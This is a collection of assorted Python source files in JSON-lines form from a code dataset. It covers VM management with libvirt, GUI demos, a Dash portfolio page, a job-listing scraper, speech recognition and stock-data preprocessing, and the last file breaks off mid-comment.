+{"seq_id":"632433390","text":"#! /usr/bin/env python\n# coding:utf8\n\nimport os\nimport libvirt\n\n\nclass VM(object):\n def __init__(self,hostip=None):\n self.conn = None\n self.hostip = hostip\n self.port = 16509\n #self.vms = vms\n #assert isinstance(self.vms,type([])), \"Type error,vms ask LIST type\"\n self.VIRT_STATE_NAME_MAP = {\n libvirt.VIR_DOMAIN_NOSTATE: 'Nostat',\n libvirt.VIR_DOMAIN_RUNNING: 'running',\n libvirt.VIR_DOMAIN_BLOCKED: 'blocking',\n libvirt.VIR_DOMAIN_PAUSED: 'paused',\n libvirt.VIR_DOMAIN_SHUTDOWN: 'shuting',\n libvirt.VIR_DOMAIN_SHUTOFF: 'shutoff',\n libvirt.VIR_DOMAIN_CRASHED: 'crashed' }\n self.connect()\n\n def set_timeout(self,ip):\n \"\"\"\n test the connected by tcp port 16509\n \"\"\"\n import socket\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n s.settimeout(5)\n try:\n s.connect((ip,self.port))\n s.shutdown(2)\n except Exception as e:\n raise Exception(\"con't connect to %s by tcp,reason:%s\" % (ip,str(e)))\n\n\n def connect(self):\n \"\"\"\n get hypervisor via tcp\n \"\"\"\n\n self.set_timeout(self.hostip)\n self.conn = libvirt.open(\"qemu+tcp://%s/system\" % self.hostip)\n\n def list_all_vms(self):\n \"\"\"\n get all vms name on this hypervisor\n \"\"\"\n vms = []\n vms.extend(self.list_active_vms())\n vms.extend(self.list_inactive_vms())\n return vms\n\n\n def list_active_vms(self):\n \"\"\"\n only get active vms on this hypervisor\n \"\"\"\n vms = []\n dom_ids = self.conn.listDomainsID()\n for id_ in dom_ids:\n vms.append(self.conn.lookupByID(id_).name())\n return vms\n\n\n def list_inactive_vms(self):\n \"\"\"\n only get inactive vms on this hypervisor\n\n \"\"\"\n return self.conn.listDefinedDomains()\n\n\n def get_dom(self, vm_name):\n \"\"\"\n get the object by vm's name\n if the name not defined then return None\n \"\"\"\n if vm_name not in self.list_all_vms():\n return None\n return self.conn.lookupByName(vm_name)\n\n def get_vm_state(self,vm_name):\n \"\"\"\n get the vm's state\n \"\"\"\n dom = self.get_dom(vm_name)\n if dom:\n raw = dom.info()\n return self.VIRT_STATE_NAME_MAP.get(raw[0],'unknown')\n else:\n return \"unknown\"\n\n def close_conn(self):\n \"\"\"\n disconnect the conn\n \"\"\"\n try:\n self.conn.close()\n except:\n pass\n\n def shutdown_force(self, vm_name):\n \"\"\"\n force to shutdown vm via dom.destroy() like pulling the power.\n \"\"\"\n dom = self.get_dom(vm_name)\n dom.destroy()\n\n def shutdown(self, vm_name):\n \"\"\"\n shutdown vm via dom.sutdown()\n \"\"\"\n dom = self.get_dom(vm_name)\n dom.shutdown()\n\n def start(self, vm_name):\n \"\"\"\n start vm via dom.create()\n \"\"\"\n dom = self.get_dom(vm_name)\n dom.create()\n\n def reboot(self, vm_name):\n \"\"\"\n reboot vm via dom.reboot()\n \"\"\"\n dom = self.get_dom(vm_name)\n dom.reboot()\n\n \n\n\n","sub_path":"apps/virtual_source/views/operatevm.py","file_name":"operatevm.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"411409060","text":"#!/usr/bin/env python3\n# -*- coding: utf8 -*-\n\nimport configparser\nimport argparse\nimport sys\nimport os\n\n'''\nA program feladata: configparser modul demója, próbája, tesztje.\nKaphat paramétert futtatáskor: -c|--config amivel meg lehet adni a konfig fájl nevét,\namennyiben az eltér a \"programfájl neve.ini\"-től.\n(default név az ini_file_name = os.path... kezdetű sorban, a .splitext leválasztja a kiterjesztést\na teljes névből)\nAz add_argument metódus type paraméterében megadott FileType hatására a parser megnyitja a \nfájlt ('r' = read only)\nA ConfigParser osztály read_file() metódusa ezt a nyitott fájlt kapja paraméterként és beolvassa\nbelőle a paramétereket.\nA ConfigParser.sections() adja vissza a \"[valami név]\" formában megadott szakaszok neveit,\na .items(...) a paraméterben megadott szakasz elemeit/értékeit. Egyesével a get...() metódusokkal\nlehet lekérni ugyanezeket.\n\n'''\n\n\ndef teszt():\n arg_parser = argparse.ArgumentParser()\n ini_file_name = os.path.splitext(sys.argv[0])[0] + \".ini\"\n arg_parser.add_argument('-c', '--config', default=ini_file_name, dest='config',\n type=argparse.FileType('r'),\n help='Config file (.ini)', nargs=1)\n parsed_args = arg_parser.parse_args()\n print(parsed_args)\n\n conf_parser = configparser.ConfigParser()\n conf_parser.read_file(parsed_args.config)\n\n for i in conf_parser.sections():\n print(\"{} : {}\".format(i, conf_parser.items(i)))\n\n print(conf_parser.getboolean('router', 'debug'))\n\n\nif __name__ == \"__main__\":\n teszt()\n","sub_path":"probak/ini_parse.py","file_name":"ini_parse.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"40275895","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import PhotoImage\nfrom PIL import ImageTk\nimport dangnhap\nimport socket\nimport sinhvien\nimport diemdanh\nimport thongke\nfrom backend.dl_giangvien import tengv_email,makhoa_email,sdt_email,magv_ten,update_sdt\nfrom backend.dl_khoa import tenkhoa\nfrom backend.dl_tkb import kt_lichgiang_gv,gv_dd\nimport doimatkhau\nimport taikhoan_thongbao\nimport datetime\n\n\ndef main():\n def dinh_dang_ngay(ngay):\n ngay=str(ngay).replace(\"/\",\" \")\n ngay=str(ngay).replace(\"-\",\" \")\n d=ngay.split()\n if len(d[0])==1:\n d[0]=\"0\"+d[0]\n if len(d[1])==1:\n d[1]=\"0\"+d[1]\n if len(d[2]) ==4 :\n ngay=d[0]+\"/\"+d[1]+\"/\"+d[2]\n else:\n ngay=d[1]+\"/\"+d[0]+\"/20\"+d[2]\n return ngay\n\n def capnhat_sdt():\n if len(sdt.get()) <10 or sdt.get().isnumeric()== False:\n messagebox.showwarning(\"thông báo\",\"Số điện thoại không đúng\")\n elif update_sdt(magv,sdt.get()):\n messagebox.showinfo(\"thông báo\",\"Đã cập nhật số điện thoại\")\n else:\n messagebox.showwarning(\"Lỗi \",\"Cập nhật không thành công\")\n def thongbaodd():\n return\n # win.destroy()\n # diemdanhbu.main()\n def thietlap():\n return\n def chuyentrang_lichgiang():\n win.destroy()\n taikhoan_thongbao.main(lichgiang)\n\n def btndoimatkhau():\n win.destroy()\n doimatkhau.main()\n def menuthongke():\n win.destroy()\n thongke.main()\n\n def menudiemdanh():\n win.destroy()\n diemdanh.main()\n\n def menuthemsv():\n win.destroy()\n sinhvien.main()\n\n def dangxuat():\n ten_thiet_bi = socket.gethostname()\n file=open(ten_thiet_bi+\".txt\",\"w\")\n file.write(\"\")\n file.close()\n win.destroy()\n dangnhap.main()\n\n win=Tk()\n win.geometry(\"1000x600+300+120\")\n win.resizable(False,False)\n win.config(bg=\"green\")\n win.title(\"Menu tkinter\")\n img_bg=ImageTk.PhotoImage(file=\"img/bgtaikhoan.png\")\n img_bg1=ImageTk.PhotoImage(file=\"img/bgtaikhoan1.png\")\n ing_menuthem=ImageTk.PhotoImage(file=\"img/menuthemdl1.png\")\n ing_menudiemdanh=ImageTk.PhotoImage(file=\"img/menudiemdanh.png\")\n ing_menutaikhoan=ImageTk.PhotoImage(file=\"img/menutaikhoan1.png\")\n ing_menuthongke=ImageTk.PhotoImage(file=\"img/menuthongke.png\")\n ing_btndangxuat=ImageTk.PhotoImage(file=\"img/btndangxuat.png\")\n ing_btndangxuat1=ImageTk.PhotoImage(file=\"img/btndangxuat1.png\")\n ing_btndoimatkhau=ImageTk.PhotoImage(file=\"img/btndoimatkhau.png\")\n ing_btnthongbao=ImageTk.PhotoImage(file=\"img/btnthongbao.png\")\n ing_btnthietlap=ImageTk.PhotoImage(file=\"img/thietlap.png\")\n ing_btnquaylai=ImageTk.PhotoImage(file=\"img/btnquaylai.png\")\n ing_capnhatsdt=ImageTk.PhotoImage(file=\"img/capnhatsdt.png\")\n#------------------------------------------------------------------------------\n ten_thiet_bi = socket.gethostname()\n d=[]\n with open(ten_thiet_bi+\".txt\",\"r\") as file:\n d=file.read().split()\n email=d[0]\n makhoa=makhoa_email(email)\n tengv=tengv_email(email)\n magv=magv_ten(tengv)\n tenkh=tenkhoa(makhoa)\n sdt=StringVar()\n sdt.set(sdt_email(email))\n time = datetime.datetime.now()\n now = time.strftime(\"%x\")\n ngay=dinh_dang_ngay(now)\n lichgiang=kt_lichgiang_gv(magv,ngay)\n gvdd=gv_dd(magv,ngay)\n#-------------------------------------------------------------------------------\n bg=Canvas(win,width=1000,height=600,bg=\"green\")\n bg.pack(side=\"left\",padx=0)\n anhnen=bg.create_image(500,300,image=img_bg)\n\n menuthem=Button(bg,image=ing_menuthem,bd=0,highlightthickness=0,command=menuthemsv)\n menuthem.place(x=46,y=129)\n\n menudiemdanh=Button(bg,image=ing_menudiemdanh,bd=0,highlightthickness=0,command=menudiemdanh)\n menudiemdanh.place(x=46,y=248)\n\n menuthongke=Button(bg,image=ing_menuthongke,bd=0,highlightthickness=0,command=menuthongke)\n menuthongke.place(x=46,y=366)\n\n menutaikhoan=Button(bg,image=ing_menutaikhoan,bd=0,highlightthickness=0)\n menutaikhoan.place(x=46,y=484)\n\n btndangxuat=Button(bg,image=ing_btndangxuat,bd=0,highlightthickness=0,command=dangxuat)\n btndangxuat.place(x=248,y=44)\n\n \n Label(bg,text=tengv,font=(\"Baloo Tamma\",14),fg=\"#A672BB\",bg=\"white\").place(x=45,y=40)\n\n lbgv=Label(bg,text=tengv,font=(\"Baloo Tamma\",12),fg=\"black\",bg=\"white\")\n lbgv.place(x=570,y=205)\n \n lbtk=Label(bg,text=tenkh,font=(\"Baloo Tamma\",12),fg=\"black\",bg=\"white\")\n lbtk.place(x=570,y=145)\n\n lbe=Label(bg,text=email,font=(\"Baloo Tamma\",12),fg=\"black\",bg=\"white\")\n lbe.place(x=570,y=265)\n\n lbsdt=Entry(bg,textvariable=sdt,font=(\"Baloo Tamma\",12),fg=\"black\",bg=\"white\",bd=0,highlightthickness=0,)\n lbsdt.place(x=570,y=325)\n\n btn_capnhatsdt=Button(bg,image=ing_capnhatsdt,bd=0,highlightthickness=0,command=capnhat_sdt)\n btn_capnhatsdt.place(x=925,y=310)\n\n if lichgiang == []:\n lbcg=Label(bg,text=\"Hôm nay, bạn không có tiết giảng\",font=(\"Baloo Tamma\",12),fg=\"black\",bg=\"white\")\n lbcg.place(x=570,y=385)\n else:\n lbcg=Label(bg,text=\"Hôm nay, bạn có lịch giảng !\",font=(\"Baloo Tamma\",12),fg=\"black\",bg=\"white\")\n lbcg.place(x=570,y=385)\n btnthongbao=Button(bg,image=ing_btnthongbao,bd=0,highlightthickness=0,command=chuyentrang_lichgiang)\n btnthongbao.place(x=920,y=365)\n lbstb=Label(bg,text=len(lichgiang),fg=\"red\",font=(\"Arial\",10),bg=\"white\")\n lbstb.place(x=952,y=360)\n\n if gvdd == []:\n lbdd=Label(bg,text=\"Bạn thực hiện việc điểm danh rất tốt\",font=(\"Baloo Tamma\",12),fg=\"black\",bg=\"white\")\n lbdd.place(x=570,y=445)\n else:\n lbdd=Label(bg,text=\"Có lẽ bạn đã quên điểm danh !\",font=(\"Baloo Tamma\",12),fg=\"black\",bg=\"white\")\n lbdd.place(x=570,y=445)\n btnthongbaodd=Button(bg,image=ing_btnthongbao,bd=0,highlightthickness=0,command=thongbaodd)\n btnthongbaodd.place(x=920,y=425)\n lbstb1=Label(bg,text=len(gvdd),fg=\"red\",font=(\"Arial\",10),bg=\"white\")\n lbstb1.place(x=952,y=420)\n\n btndoimatkhau=Button(bg,image=ing_btndoimatkhau,bd=0,highlightthickness=0,command=btndoimatkhau)\n btndoimatkhau.place(x=672,y=539)\n\n btndangxuat1=Button(bg,image=ing_btndangxuat1,bd=0,highlightthickness=0,command=dangxuat)\n btndangxuat1.place(x=836,y=537)\n\n # btnthietlap=Button(bg,image=ing_btnthietlap,bd=0,highlightthickness=0,command=thietlap)\n # btnthietlap.place(x=949,y=2)\n \n win.mainloop()\n\nif __name__ == '__main__':\n main()","sub_path":"taikhoan.py","file_name":"taikhoan.py","file_ext":"py","file_size_in_byte":6619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"387994374","text":"import plotly_express as px\nimport plotly.graph_objs as go\n\nimport dash\nimport dash_html_components as html\nimport dash_core_components as dcc\nimport dash_daq as daq\nfrom dash.dependencies import Input, Output, State\nimport dash_table\nimport dash_bootstrap_components as dbc\n\n\napp = dash.Dash(\n __name__,\n external_stylesheets=[dbc.themes.FLATLY],\n meta_tags=[\n {\"name\": \"viewport\", \"content\": \"width=device-width, initial-scale=1.0\"}\n ]\n)\n\napp.config['suppress_callback_exceptions'] = True\n\nnavbar = dbc.NavbarSimple(\n children=[],\n brand=\"Beetle\",\n color=\"primary\",\n dark=True\n)\n\nicon_name = ['static/facebook.png', 'static/twitter.png', 'static/insta.png']\nurl_list = ['https://www.facebook.com/i80846dx2/',\n 'https://twitter.com/i80486dx23419', 'https://www.instagram.com/takuya3419/']\n\nmy_img = dbc.CardColumns([\n dbc.Card(\n [dbc.CardImg(src=\"/static/face.png\", top=True),\n dbc.CardBody([\n html.H5(\"Beetle\", className=\"card-title\"),\n dbc.Button(\n \"Contact\",\n color=\"primary\",\n id=\"collapse-button\"\n ),\n dbc.Collapse(\n [\n dbc.Row([\n dbc.Col(\n html.A(\n html.Img(src=icon,\n height=\"30px\"),\n href=link\n )\n )\n for icon, link in zip(icon_name, url_list)])\n ],\n id=\"collapse\",\n style={'padding': '10pt 0 0 0',\n 'borderWidth': '0'}\n )\n ])]\n )\n])\n\nhobby_list = ['ドライブ', 'サイクリング', 'サカナクション', 'KIRINJI']\nhobby = [\n dbc.CardImg(src=\"/static/hobby.png\", top=True),\n dbc.CardHeader(\"趣味\", style={'font-weight': 'bold'}),\n dbc.CardBody(\n [\n html.Li(\n key,\n className=\"card-text\",\n )\n for key in hobby_list\n ]\n )\n]\n\nkeyword = ['python', 'Raspberry Pi', 'IoT', 'plotly', 'Dash']\nskills = [\n dbc.CardHeader('キーワード', style={'font-weight': 'bold', 'color': 'black'}),\n dbc.CardBody(\n [\n html.Li(\n key,\n className=\"card-text\",\n )\n for key in keyword],\n style={'color': 'black'}\n )\n]\n\n# video\narm = [\n html.Video(\n src='static/servo.mov',\n style={'width': '100%'},\n autoPlay=True,\n loop=True,\n muted=True\n ),\n dbc.CardHeader('obnizを用いたサーボの制御', style={'font-weight': 'bold'})\n]\n\nai_car = [\n html.Video(\n src='static/ai.mov',\n style={'width': '100%'},\n autoPlay=True,\n loop=True,\n muted=True\n ),\n dbc.CardHeader('SOVO代替プロジェクト', style={'font-weight': 'bold'})\n]\n\ncutter = [\n html.Video(\n src='static/cutter.mov',\n style={'width': '100%'},\n autoPlay=True,\n loop=True,\n muted=True\n ),\n dbc.CardHeader('レーザーカッターによるアクリル板の切断', style={'font-weight': 'bold'})\n]\n\n# article\nsv = [\n dbc.CardImg(src=\"/static/sv.png\", top=True),\n dbc.CardBody(\n [\n html.H5(\"シリコンバレー\", className=\"card-title\"),\n html.P(\n \"シリコンバレーに2週間滞在し、現地で企業見学をしたりコワーキングスペースでIoTデバイスを開発したりした。\"\n ),\n dbc.Button(dbc.CardLink(\n 'Read more', href='https://i80486dx2.blogspot.com/',target=\"_blynk\"), color=\"light\"),\n ]\n ),\n]\n\nnz = [\n dbc.CardImg(src=\"/static/nz.png\", top=True),\n dbc.CardBody(\n [\n html.H5(\"ニュージーランド\", className=\"card-title\"),\n html.P(\n \"ニュージーランドのワイカトにて、3週間に渡る語学研修に参加した。\",\n className=\"card-text\",\n ),\n dbc.Button(dbc.CardLink(\n 'Read more', href='https://docs.google.com/presentation/d/1fwsToLe9pwLEZ9H8nWkKPj5uiYi_l79lv-2rPHA5yOQ/edit?usp=sharing',target=\"_blynk\"), color=\"light\"),\n ]\n ),\n]\n\ngugen = [\n dbc.CardImg(src=\"https://gugen.jp/uploads/20191103095639525.png\", top=True),\n dbc.CardBody(\n [\n html.H5(\"Skeleton recognition\", className=\"card-title\"),\n html.P(\n \"シリコンバレーで生まれた作品をGUGENで展示した。\",\n className=\"card-text\",\n ),\n dbc.Button(dbc.CardLink(\n 'Read more', href='https://gugen.jp/entry2019/2019-019',target=\"_blynk\") ,color=\"light\")\n ]\n ),\n]\n\ne_2018 = ['6月 会津の未来を考える提言(アイデアソン)優秀賞受賞',\n '12月 Yahoo! Hack Day 2018 (学外ハッカソン) 出場']\ne_2019 = ['2月 TDKハッカソン (学内ハッカソン) 優勝', '6月 Spa Jam 仙台予選 (学外ハッカソン) 出場', '7月 令和初ハッカソン 出場',\n '10月 健康作りハッカソン(学内ハッカソン)優秀賞受賞', '11月 目指せ愛されキャラ!推しキャラハッカソン (学外ハッカソン)最優秀賞受賞', '12月 GUGEN 一次審査突破 作品展示(東京)']\ne_2020 = ['5月 コロナウイルスにITで立ち向かおう! グッドアイディア賞 グッドプロトタイプ賞 受賞']\n\ndata = ['2018']\ndata.append(html.Br())\nfor y1 in e_2018:\n data.append(\n html.P(\n y1,\n className=\"card-text\",\n )\n )\ndata.append('2019')\nfor y2 in e_2019:\n data.append(\n html.P(\n y2,\n className=\"card-text\",\n )\n )\ndata.append(html.Br())\ndata.append('2020')\nfor y3 in e_2020:\n data.append(\n html.P(\n y3,\n className=\"card-text\",\n )\n )\ndata.append(html.Br())\n\nevent = [\n dbc.CardImg(src=\"/static/presen.png\", top=True),\n dbc.CardHeader('出場イベント', style={'font-weight': 'bold'}),\n dbc.CardBody(\n [\n html.P(\n 'アイデアソン:1件',\n className=\"card-text\",\n ),\n html.P(\n 'ハッカソン:8件',\n className=\"card-text\",\n ),\n dbc.Button(\n \"Read more\",\n color=\"light\",\n id=\"collapse-button2\"\n ),\n dbc.Collapse(\n data,\n id=\"collapse2\",\n style={'padding': '10pt 0 0 0'}\n )\n ]\n )\n]\n\ncards = html.Div([\n dbc.CardColumns([\n dbc.Card(hobby, color=\"primary\", inverse=True),\n dbc.Card(ai_car, color=\"secondary\", inverse=True),\n dbc.Card(skills, inverse=True),\n dbc.Card(cutter, color=\"secondary\", inverse=True),\n dbc.Card(sv, color=\"info\", inverse=True),\n dbc.Card(gugen, color=\"warning\", inverse=True),\n dbc.Card(arm, color=\"secondary\", inverse=True),\n dbc.Card(event, color=\"danger\", inverse=True),\n dbc.Card(nz, color=\"success\")\n ])\n])\n\n\napp.layout = html.Div([\n navbar,\n dbc.Row([\n dbc.Col(\n [\n my_img\n ],\n style={'padding': '30pt 0 0 0'},\n width={'size': 6, 'offset': 3}\n ),\n dbc.Col(\n [\n cards\n ],\n style={'padding': '30pt 0 0 0'},\n width={'size': 6, 'offset': 3}\n )\n ]\n )\n])\n\n\n@ app.callback(\n Output(\"collapse\", \"is_open\"),\n [Input(\"collapse-button\", \"n_clicks\")],\n [State(\"collapse\", \"is_open\")],\n)\ndef toggle_collapse(n, is_open):\n if n:\n return not is_open\n return is_open\n\n\n@ app.callback(\n Output(\"collapse2\", \"is_open\"),\n [Input(\"collapse-button2\", \"n_clicks\")],\n [State(\"collapse2\", \"is_open\")],\n)\ndef toggle_collapse2(n, is_open):\n if n:\n return not is_open\n return is_open\n\n\ndef make_data():\n e_2018 = []\n e_2019 = []\n e_2020 = []\n\n data = ['2018']\n for y1 in e_2018:\n data.append(\n html.P(\n y1,\n className=\"card-text\",\n )\n )\n data.append('2019')\n for y2 in e_2019:\n data.append(\n html.P(\n y2,\n className=\"card-text\",\n )\n )\n data.append('2020')\n for y3 in e_2019:\n data.append(\n html.P(\n y3,\n className=\"card-text\",\n )\n )\n\n\nif __name__ == '__main__':\n make_data()\n app.run_server(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"20186057","text":"#!/usr/bin/env python\n\nimport gtk\n\nclass Toolbar(gtk.Window):\n def __init__(self):\n gtk.Window.__init__(self)\n self.set_title(\"Toolbar\")\n self.set_default_size(500, -1)\n self.connect(\"destroy\", gtk.main_quit)\n\n toolbar = gtk.Toolbar()\n self.add(toolbar)\n\n toolbutton1 = gtk.ToolButton(gtk.STOCK_ADD)\n toolbar.insert(toolbutton1, 0)\n toolbutton2 = gtk.ToolButton(gtk.STOCK_REMOVE)\n toolbar.insert(toolbutton2, 1)\n\n separatortoolitem = gtk.SeparatorToolItem()\n toolbar.insert(separatortoolitem, 2)\n\n toggletoolbutton = gtk.ToggleToolButton(gtk.STOCK_MEDIA_PLAY)\n toolbar.insert(toggletoolbutton, 3)\n\n separatortoolitem = gtk.SeparatorToolItem()\n toolbar.insert(separatortoolitem, 4)\n\n radiotoolbutton1 = gtk.RadioToolButton(None, gtk.STOCK_NEW)\n toolbar.insert(radiotoolbutton1, 5)\n radiotoolbutton2 = gtk.RadioToolButton(radiotoolbutton1, gtk.STOCK_OPEN)\n toolbar.insert(radiotoolbutton2, 6)\n\n separatortoolitem = gtk.SeparatorToolItem()\n toolbar.insert(separatortoolitem, 7)\n\n menutoolbutton1 = gtk.MenuToolButton(gtk.STOCK_GO_BACK)\n toolbar.insert(menutoolbutton1, 8)\n menutoolbutton2 = gtk.MenuToolButton(gtk.STOCK_GO_FORWARD)\n toolbar.insert(menutoolbutton2, 9)\n\nwindow = Toolbar()\nwindow.show_all()\n\ngtk.main()\n","sub_path":"examples/toolbar.py","file_name":"toolbar.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"636467773","text":"from analyze_mecab import analyze_keitaiso\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.font_manager\r\nfontprop = matplotlib.font_manager.FontProperties(fname=\"/home/ohya/.pyenv/versions/anaconda3-4.3.0/lib/python3.6/site-packages/matplotlib/mpl-data/fonts/ttf/ipaexm.ttf\")\r\ndef word_dic(keitaiso_list):\r\n word_dic = {}\r\n for keitaiso in keitaiso_list:\r\n word = keitaiso[\"base\"]\r\n if not word in word_dic:\r\n word_dic[word] = 0\r\n word_dic[word] = word_dic[word] + 1\r\n return sorted(word_dic.items(),key=lambda x: x[1],reverse=True)[:10]\r\n\r\ntop10 = word_dic(analyze_keitaiso())\r\ntop10 = list(zip(*top10))\r\n_list = [i for i in range(10)]\r\n\r\nplt.bar(_list,top10[1],align = \"center\")\r\nplt.xticks(_list,top10[0],fontproperties = fontprop)\r\nplt.title(\"top10 frequency words\")\r\nplt.savefig(\"top10.png\")\r\n","sub_path":"stage4/ex37.py","file_name":"ex37.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"431166728","text":"\"\"\"\nRubiconPeople spider created on the top of ATSSpider\n\nscrapy crawl rubicon_people -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://www.rubiconpeople.co.uk/search?qs=\"\n\nSample URL:\n http://www.rubiconpeople.co.uk/search?qs=\n\"\"\"\n\nfrom json import loads\nfrom scrapy.http import Request\nfrom urllib import urlencode\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import ConvertDateString, Prefix, RemoveBadElements\n\n\nclass RubiconPeople(ATSSpider):\n\n name = 'rubicon_people'\n disable_default_field_extractors = True\n\n def start_requests(self):\n path = '/api/content/job?%s' % urlencode({\n \"filter\": \"Industry ne ''\",\n \"orderby\": \"CreatedDate desc\",\n \"top\": \"9\",\n })\n yield Request(\n callback=self.parse_job_callback(),\n url=urljoin(self.start_urls[0], path)\n )\n\n def parse_job(self, response):\n \"\"\"\n Extract all required information.\n \"\"\"\n jsonResponse = loads(response.body)\n if jsonResponse:\n # set expected job count\n if not self.expected_job_count_set:\n self.expected_job_count = jsonResponse.get('TotalResults', 0)\n\n results = jsonResponse.get('Results')\n if results:\n for item in results:\n url = urljoin(response.url, item.get('NavigateUrl'))\n loader = BrightcorpItemLoader(selector=item)\n\n loader.add_value(\n 'title', item.get('JobTitle')\n )\n loader.add_value(\n 'location', item.get('JobLocation')\n )\n loader.add_value(\n 'referencenumber',\n item.get('JobReference'),\n Prefix('%s-' % self.name)\n )\n loader.add_value(\n 'date',\n item.get('ModifiedDate'),\n ConvertDateString('%Y-%m-%dT%X.%f')\n )\n loader.add_value('url', url)\n loader.add_value(\n 'description',\n item.get('JobDescription'),\n RemoveBadElements(['img'])\n )\n loader.add_value(\n 'jobtype', item.get('JobType')\n )\n loader.add_value(\n 'jobcategory', item.get('Industry')\n )\n loader.add_value(\n 'baseSalary', item.get('Salary')\n )\n loader.add_value(\n 'skills', item.get('JobSkills')\n )\n loader.add_value('apply_url', url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/rubicon_people.py","file_name":"rubicon_people.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"310828869","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 11 22:18:06 2020\n\n@author: gerard\n\nhttps://realpython.com/python-speech-recognition/\n\"\"\"\n\n\nimport speech_recognition as sr\nimport pyaudio\nimport wave\n\ndef recorder(WAVE_OUTPUT_FILENAME = \"output.wav\"):\n CHUNK = 1024\n FORMAT = pyaudio.paInt16\n CHANNELS = 2\n RATE = 44100\n RECORD_SECONDS = 5\n \n p = pyaudio.PyAudio()\n \n stream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n frames_per_buffer=CHUNK)\n \n print(\"* recording\")\n \n frames = []\n \n for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n data = stream.read(CHUNK)\n frames.append(data)\n \n print(\"* done recording\")\n \n stream.stop_stream()\n stream.close()\n p.terminate()\n \n wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb')\n wf.setnchannels(CHANNELS)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(RATE)\n wf.writeframes(b''.join(frames))\n wf.close()\n\n#%%\n# =============================================================================\n# Getting text from audios\n# =============================================================================\n\nr = sr.Recognizer()\n\n#1. Basic\nharvard = sr.AudioFile(\"output.wav\")\nwith harvard as source:\n audio = r.record(source)\n \n#2. Duration\nharvard = sr.AudioFile(\"output.wav\")\nwith harvard as source:\n audio = r.record(source, duration=4) #refering to seconds\n \n#3. Offset (starting later)\nharvard = sr.AudioFile(\"output.wav\")\nwith harvard as source:\n audio = r.record(source, offset=3) #refering to seconds\n \n# Deal with ambient noise\nharvard = sr.AudioFile(\"output.wav\")\nwith harvard as source:\n r.adjust_for_ambient_noise(source, duration=0.5)\n audio = r.record(source, offset=3) #refering to seconds\n\n# Get a JSON string with all the alternatives\nprint(r.recognize_google(audio, show_all='True'))\n\n#%%\n# =============================================================================\n# Using microphones\n# =============================================================================\n\nr = sr.Recognizer()\nmic = sr.Microphone(device_index=14)\n#print(sr.Microphone.list_microphone_names()) # device_index=3\n\nwith mic as source:\n #r.energy_threshold = 0 #257 by default\n r.adjust_for_ambient_noise(source, duration=2)\n audio = r.listen(source)\n\nprint(r.recognize_google(audio)) #language='sp-SP'\n\n\n\n\n\n\n","sub_path":"scripts/audioBot.py","file_name":"audioBot.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"7079957","text":"import os\r\nimport themata\r\n\r\ndef get_path():\r\n \"\"\"\r\n Return the path to the milkish theme\r\n \"\"\"\r\n return os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\r\n\r\ndef setup(app):\r\n if hasattr(app, \"add_html_theme\"):\r\n theme_path = os.path.abspath(os.path.dirname(__file__))\r\n app.add_html_theme(\"milkish\", theme_path)\r\n app.connect(\"html-page-context\", themata.update_context)\r\n app.connect('build-finished', themata.copy_custom_files)\r\n return {\"version\": themata.__version}","sub_path":"themata/milkish/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"62246998","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport FinanceDataReader as fdr\nimport datetime\nimport matplotlib as mpl\nimport tensorflow as tf\nimport numpy as np\nimport sklearn\nimport sklearn.preprocessing\n\nyear = input(\"몇 년치 주가 로딩? (숫자만):\")\nName = input(\"기업명 입력 (포스코 or SK하이닉스) : \")\ndf = fdr.StockListing(\"kospi\")\nsym = df[df['Name']==Name]['Symbol'].iloc[0]\n#today = datetime.datetime.today()\n#start = today - datetime.timedelta(days = 365*int(year))\nstock_df = fdr.DataReader(sym, \"2014.10.22\", \"2018.10.23\")\n#이평선 계산 후 데이터프레임 컬럼 추가\n#%%\n\ndef normalize_data(df):\n min_max_scaler = sklearn.preprocessing.MinMaxScaler()\n df['Open'] = min_max_scaler.fit_transform(df['Open'].values.reshape(-1,1))\n df['High'] = min_max_scaler.fit_transform(df['High'].values.reshape(-1,1))\n df['Low'] = min_max_scaler.fit_transform(df['Low'].values.reshape(-1,1))\n df['Close'] = min_max_scaler.fit_transform(df['Close'].values.reshape(-1,1))\n return df\n#주어진 시퀀스 렝스와, 주가 데이터로 train, validation, test데이터 셋 자르는 함수\n\n#2/len(df_stock)\ndef load_data(stock, seq_len):\n valid_set_size_percentage = 20\n test_set_size_percentage = 20\n data_raw = stock.as_matrix() # numpy.arrary형식으로 바꾸기\n data = []\n \n # 모든 가능한 